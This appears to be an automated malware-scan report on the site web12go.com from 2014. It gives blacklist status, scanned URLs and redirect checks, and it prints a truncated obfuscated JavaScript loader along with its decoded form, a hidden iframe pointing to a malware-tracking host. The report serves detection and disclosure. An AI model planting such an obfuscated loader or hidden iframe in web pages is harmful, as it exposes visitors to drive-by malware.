Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=web12go.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web12go.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://web12go.com/ | 200 OK Content-Length: 2507 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
function c265607b11i49b96735c2c6e(i49b96735c3053){ function i49b96735c3439(){var i49b96735c3824=16;return i49b96735c3824;} return (parseInt(i49b96735c3053,i49b96735c3439()));}function i49b96735c3ff0(i49b96735c43da){ function i49b96735c5377(){var i49b96735c575f=2;return i49b96735c575f;} var i49b96735c481a='';i49b96735c61e6=String.fromCharCode;for(i49b96735c4f96=0;i49b96735c4f96<i49b96735c43da.length;i49b96735c4f96+=i49b96735c5377()){ i49b96735c481a+=(i49b96735c61e6(c265607b11i49b96735c2c6e(i49
Decoded script:
<iframe name=c26 src='http://malwaretracksystem.com/?'+Math.round(Math.random()*124218)+'5ee499417' width=309 height=402 style='visibility:hidden'></iframe>
Antivirus reports:
http://web12go.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 03 Oct 2014 00:30:29 GMT Location: http://www.xel.nl/pagina-niet-gevonden Server: Apache Vary: Accept-Encoding Content-Length: 222 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.xel.nl/pagina-niet-gevonden | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 03 Oct 2014 00:30:24 GMT Pragma: no-cache Location: https://www.xel.nl/pagina-niet-gevonden Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.xel.nl/xmlrpc.php | clean |
https://www.xel.nl/pagina-niet-gevonden | 404 Not Found Content-Length: 18977 Content-Type: text/html | clean |
https://www.xel.nl/wp-content/cache/minify/000000/LclBDoAgDADBD5kWPPqbog3SgEWKCf7eaDzu7N57tQWRhAZE1ZiZajJYtXyGOQVDOS9uN3rwDua_oKQDxCaHg3PhLRGKYVDt1hvVdz8.js?ddb85c | 200 OK Content-Length: 122088 Content-Type: application/x-javascript | clean |
http://web12go.com/controlcenter | HTTP/1.1 302 Found Connection: close Date: Fri, 03 Oct 2014 00:30:32 GMT Location: http://www.xel.nl/pagina-niet-gevonden Server: Apache Vary: Accept-Encoding Content-Length: 222 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.xel.nl/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 03 Oct 2014 00:30:26 GMT Pragma: no-cache Location: https://www.xel.nl/test404page.js Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.xel.nl/xmlrpc.php | clean |
https://www.xel.nl/test404page.js | 404 Not Found Content-Length: 18978 Content-Type: text/html | clean |
https://www.xel.nl/ | 200 OK Content-Length: 26506 Content-Type: text/html | clean |
https://www.xel.nl/controlcenter | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 03 Oct 2014 00:30:29 GMT Location: https://www.xel.nl/controlcenter/ Server: Apache Vary: Accept-Encoding Content-Length: 241 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.xel.nl/controlcenter/ | 200 OK Content-Length: 4206 Content-Type: text/html | clean |
https://www.xel.nl/controlcenter/res/mootools-1.2-core.js | 200 OK Content-Length: 96542 Content-Type: application/javascript | clean |
https://www.xel.nl/res/mootools-1.2-more.js | 404 Not Found Content-Length: 18988 Content-Type: text/html | clean |
https://www.xel.nl//webmail.xel.nl/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 03 Oct 2014 00:30:32 GMT Pragma: no-cache Location: https://www.xel.nl/webmail.xel.nl/ Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: https://www.xel.nl/xmlrpc.php | clean |
https://www.xel.nl/webmail.xel.nl/ | 404 Not Found Content-Length: 18972 Content-Type: text/html | clean |
https://www.xel.nl/domeinregistratie-bij-xel-media | 200 OK Content-Length: 26161 Content-Type: text/html | clean |
https://www.xel.nl/domeinnaam-extensies | 200 OK Content-Length: 28732 Content-Type: text/html | clean |
https://www.xel.nl/domeindiensten | 200 OK Content-Length: 25076 Content-Type: text/html | clean |
https://www.xel.nl/domeinnaam-verhuizen | 200 OK Content-Length: 24010 Content-Type: text/html | clean |
https://www.xel.nl/domeinregistratie-diensten-uitbreiden | 200 OK Content-Length: 20062 Content-Type: text/html | clean |
https://www.xel.nl//www.xel.nl/helpdesk/domeinnaam/wat-is-een-domeinnaam/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 03 Oct 2014 00:30:40 GMT Pragma: no-cache Location: https://www.xel.nl/helpdesk/wat-is-een-domeinnaam/ Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: https://www.xel.nl/xmlrpc.php | clean |
https://www.xel.nl/helpdesk/wat-is-een-domeinnaam/ | 200 OK Content-Length: 21385 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: web12go.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 00:30:29 GMT
Accept-Ranges: bytes
ETag: "78d6c-9cb-464f15db6ce40"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2507
Content-Type: text/html
Last-Modified: Thu, 12 Mar 2009 19:55:29 GMT
...2507 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: web12go.com
Referer: http://www.google.com/search?q=web12go.com
Result:
The result is similar to the first query. There are no suspicious redirects found.